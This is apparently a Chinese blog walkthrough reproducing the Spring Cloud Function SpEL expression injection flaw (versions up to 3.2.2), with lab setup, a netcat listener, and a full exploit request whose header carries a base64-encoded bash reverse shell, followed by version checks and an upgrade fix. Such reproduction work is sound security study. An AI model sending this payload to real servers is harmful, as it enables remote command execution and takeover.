Spring Cloud Function SpEL表达式注入漏洞复现

漏洞描述

Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。

影响版本

Spring Cloud Function SPEL表达式注入漏洞影响范围:
3 <= spring-cloud-function-context <= 3.2.2
3 <= spring-cloud-function-core <= 3.2.2

编译环境

1、在IDEA中选择新建项目,然后选择Spring Initializr,输入随机项目名称,然后选择java版本和jdk版本后点击下一步。
2、选择Spring WebFunction作为依赖项,点击完成。
3、配置pom.xml,添加漏洞组件版本号

            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-function-web</artifactId>
            <version>3.2.2</version>

4、 在src\main\resources\application.properties增加如下修改端口

server.port=80

如果本地复现,可以直接在idea中运行项目即可。如果要放到服务器上复现,可以编译成jar包。参照后面的步骤。
5、编译配置
5.1 修改pom.xml,增加finalName

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
        <finalName>springcloudspel</finalName>
    </build>

5.2 选择右边的mavn 找打项目 Lifecycle下的package打包。
6、将jar包放到服务器执行。

漏洞复现

服务器运行测试程序:
在这里插入图片描述
本地开监听

nc -lvnp 88

发送exp

POST /functionRouter HTTP/1.1
Host: 127.0.0.1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODggMD4mMQo=}|{base64,-d}|{bash,-i}")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

xxx

触发反弹shell:
在这里插入图片描述

缓解措施

高危:目前漏洞细节和利用代码已经公开,攻击者可利用该漏洞远程在目标系统上执行任意代码,建议使用相关系统的用户尽快采取安全措施。
1、检测:
对使用了spring-cloud-function-context 组件的项目代码进 行排查,可用以下命令查看版本:
grep-A 2’spring-cloud-function-context’pom.xml
grep-A 2’spring-cloud-function-core’pom.xml
若当前版本在受影响范围内,则存在安全风险。
2、处置:
更新Spring Cloud Function到3.2.3。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丶拾光_w4ngz

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值